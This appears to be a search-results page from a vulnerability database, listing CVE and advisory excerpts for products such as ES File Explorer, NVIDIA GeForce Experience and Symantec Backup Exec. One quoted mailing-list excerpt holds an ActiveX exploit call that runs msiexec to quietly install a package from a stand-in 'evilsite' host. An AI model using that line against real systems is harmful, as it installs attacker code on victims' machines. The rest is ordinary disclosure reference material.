Lucene search
K

51 matches found

Cvelist
Cvelist
added 2019/01/16 2:0 p.m.23 views

CVE-2019-6447

The ES File Explorer File Manager application through 4.1.9.7.4 for Android allows remote attackers to read arbitrary files or execute applications via TCP port 59777 requests on the local Wi-Fi network. This TCP port remains open after the ES application has been launched once, and responds to...

8.1AI score0.6202EPSS
Exploits8References3
UbuntuCve
UbuntuCve
added 2019/01/09 11:29 p.m.23 views

CVE-2018-20681

mate-screensaver before 1.20.2 in MATE Desktop Environment allows physically proximate attackers to view screen content and possibly control applications. By unplugging and re-plugging or power-cycling external output devices such as additionally attached graphical outputs via HDMI, VGA, DVI, etc...

6.1CVSS6.4AI score0.00576EPSS
Exploits1References5
Cvelist
Cvelist
added 2018/08/18 2:0 a.m.23 views

CVE-2018-15491

A vulnerability in the permission and encryption implementation of Zemana Anti-Logger 1.9.3.527 and prior fixed in 1.9.3.602 allows an attacker to take control of the whitelisting feature MyRules2.ini under %LOCALAPPDATA%\Zemana\ZALSDK to permit execution of unauthorized applications such as ones...

7.6AI score0.01008EPSS
Exploits0References1
Apple
Apple
added 2017/10/31 12:0 a.m.67 views

About the security content of watchOS 4.1

About the security content of watchOS 4.1 This document describes the security content of watchOS 4.1. About Apple security updates For our customers' protection, Apple doesn't disclose, discuss, or confirm security issues until an investigation has occurred and patches or releases are available...

9.3CVSS0.6AI score0.03782EPSS
Exploits4References1Affected Software1
NVD
NVD
added 2017/05/12 2:29 p.m.14 views

CVE-2017-0245

The kernel-mode drivers in Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1 and Windows Server 2012 Gold allow a local authenticated attacker to execute a specially crafted application to obtain kernel information, aka "Win32k Information Disclosure Vulnerability."...

4.7CVSS4.8AI score0.07704EPSS
Exploits1References3
Prion
Prion
added 2017/04/28 9:59 p.m.23 views

Design/Logic Flaw

NVIDIA GeForce Experience contains a vulnerability in NVIDIA Web Helper.exe, where untrusted script execution may lead to violation of application execution policy and local code execution...

4.6CVSS8.6AI score0.00352EPSS
Exploits0References2Affected Software1
NVD
NVD
added 2017/04/28 9:59 p.m.38 views

CVE-2017-6250

NVIDIA GeForce Experience contains a vulnerability in NVIDIA Web Helper.exe, where untrusted script execution may lead to violation of application execution policy and local code execution...

8.8CVSS8.7AI score0.00352EPSS
Exploits0References2
BDU FSTEC
BDU FSTEC
added 2017/04/06 12:0 a.m.6 views

Microsoft Edge browser vulnerability, allowing a hacker to execute an application with privileges of the current user

The vulnerability of the rendering mechanisms for executing browser script scenarios in Microsoft Edge is related to deficiencies in access control for certain functions. Exploiting this vulnerability can allow a malicious actor to execute an application with privileges of the current user...

7.6CVSS7.3AI score0.27051EPSS
Exploits0References3
Positive Technologies
Positive Technologies
added 2017/01/27 12:0 a.m.9 views

PT-2017-04: Security Restrictions Bypass in Kaspersky Embedded Systems Security

The specialists of the Positive Research center have detected a Security Restrictions Bypass vulnerability in Kaspersky Embedded Systems Security. Vulnerability in the Application Control component of Kaspersky Embedded Systems Security allows attackers to gain privileges and execute arbitrary...

7.1CVSS7.9AI score
Exploits0References5
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.14 views

Interactive Studio GamePort 3.0/3.1/4.0 Arbitrary application execution

No description provided by source. source: http://www.securityfocus.com/bid/12006/info Gameport is reported prone to multiple vulnerabilities in the client and server. These issues may allow an attacker to gain unauthorized access to a vulnerable server and execute arbitrary code on a vulnerable...

7.1AI score
Exploits0
The Hacker News
The Hacker News
added 2012/01/12 5:49 a.m.15 views

Self-extracting archive (SFX) as Creative Virus Handler

Self-extracting archive SFX as Creative Virus Handler Yesterday I Found and interesting article about "Self-extracting archive SFX" on Unremote.org by DarkCoderSc. SFX is a little application that contains compressed files. Creating a customized WinRAR SFX archives is a very easy task, but not al...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2010/05/27 12:0 a.m.29 views

ghostscript code execution

Application is executed by relative path upon .ps file parsing...

2.7AI score
Exploits0References1Affected Software1
seebug.org
seebug.org
added 2009/09/02 12:0 a.m.21 views

SILC Toolkit 'command.c'格式串漏洞

Bugraq ID: 36193 SILC Toolkit是一款提供SILC协议实现的软件开发工具集。 SILC Toolkit 'command.c'文件存在格式串错误,远程攻击者可以利用漏洞以应用程序权限执行任意指令。 目前没有详细漏洞细节提供。 SILC Toolkit 1.1.8 SILC Toolkit 1.1.6 SILC Toolkit 1.1.5 SILC Toolkit 1.1.4 SILC Toolkit 1.1.3 SILC Toolkit 1.1.2 SILC Toolkit 1.1.1 SILC Toolkit 1.1 厂商解决方案 用户可联系供应商升级到SIL...

6.9AI score
Exploits0
seebug.org
seebug.org
added 2008/11/06 12:0 a.m.23 views

Dns2tcp 'dns_decode.c'远程缓冲区溢出漏洞

BUGTRAQ ID: 32071 CNCAN ID:CNCAN-2008110402 Dns2tcp是在DNS报文中分装TCP会话的一套工具。 Dns2tcp 'dnsdecode.c'存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。 目前没有详细漏洞细节提供。 Herve Schauer Consultants HSC Dns2tcp 0.4.1 Herve Schauer Consultants HSC Dns2tcp 0.4 Herve Schauer Consultants HSC Dns2tcp 0.4 Herve Schauer Consultants H...

6.9AI score
Exploits0
OpenVAS
OpenVAS
added 2008/08/22 12:0 a.m.21 views

Adobe Presenter viewer.swf and loadflash.js XSS Vulnerability

The host is running Adobe Presenter, which prone to to input validation errors which can be exploited by malicious people to conduct cross-site scripting vulnerability. OpenVAS Vulnerability Test $Id: secpodadobepresenterxssvuln900110.nasl 5370 2017-02-20 15:24:26Z cfi $ Description: Adobe...

4.3CVSS5.9AI score0.01811EPSS
Exploits1References3
RedHat Linux
RedHat Linux
added 2008/05/19 3:30 p.m.6 views

Java Plugin same-origin-policy bypass

Unspecified vulnerability in the Java Plug-in for Sun JDK and JRE 6 Update 4 and earlier, and 5.0 Update 14 and earlier; and SDK and JRE 1.4.216 and earlier, and 1.3.121 and earlier; allows remote attackers to bypass the same origin policy and "execute local applications" via unknown vectors...

6.8CVSS5.8AI score0.04458EPSS
Exploits0References4
securityvulns
securityvulns
added 2008/01/09 12:0 a.m.32 views

Re: [Full-disclosure] Gateway WebLaunch ActiveX Control Insecure Method

I was playing with this a bit more. Everybody has the Windows Installer installed, right? How about this: obj.DoWebLaunch"","........windowssystem32msiexec.exe", "","/i http://www.evilsite.com/evilapp.msi /quiet"; Elazar On Tue, 08 Jan 2008 20:08:53 -0500 [email protected] wrote: The DoWebLaunc...

1.9AI score
Exploits0
seebug.org
seebug.org
added 2007/12/15 12:0 a.m.10 views

Windows平台下的Symantec Backup Exec存在未明远程漏洞

BUGTRAQ ID: 26837 CNCAN ID:CNCAN-2007121405 Symantec Backup Exec是一款集中式管理功能的网络数据保护解决方案。 Window平台下的Symantec Backup Exec存在未明安全问题,远程攻击者可以利用漏洞以应用程序进程权限执行任意指令。 目前没有详细漏洞细节提供。 Symantec Backup Exec for Windows Servers 11d 目前没有详细解决方案提供: http://www.symantec.com/backupexec/index.jsp...

6.9AI score
Exploits0
securityvulns
securityvulns
added 2007/12/06 12:0 a.m.158 views

zabbix privilege escalation

Super-user privileges are not droppen on user-supplied application execution...

2.1CVSS3.4AI score0.00777EPSS
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2007/12/02 12:0 a.m.28 views

QEMU virtual machine buffer overflow

Buffer overflow in TranslationBlock on application execution in Guest OS...

3.5AI score
Exploits0References1Affected Software1
Rows per page
Query Builder